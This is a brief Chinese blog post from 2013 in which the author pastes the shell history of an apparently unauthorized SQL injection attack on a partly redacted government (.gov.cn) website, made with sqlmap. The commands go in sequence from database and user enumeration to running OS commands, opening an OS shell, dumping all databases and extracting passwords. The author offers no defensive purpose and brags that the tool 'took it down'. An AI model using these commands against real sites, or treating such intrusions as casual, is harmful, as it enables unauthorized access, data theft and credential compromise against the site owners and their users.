今天的一次渗透

这次渗透没有什么亮点,主要就是SQLMAP。这玩意很给力。直接给干掉了。。。

 2005  sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --dbs --threads 10
 2006  sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --users --threads 10
 2007  sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --os-cmd="net user" --threads 10
 2008  sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --os-cmd=dir --threads 10
 2009  sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --os-shell --threads 10
 2010  sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --dump-all --threads 10
 2011  sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --passwords --threads 10

mark 一下..

posted @ 2013-07-19 16:25  墨迹哥's  阅读(274)  评论(0编辑  收藏  举报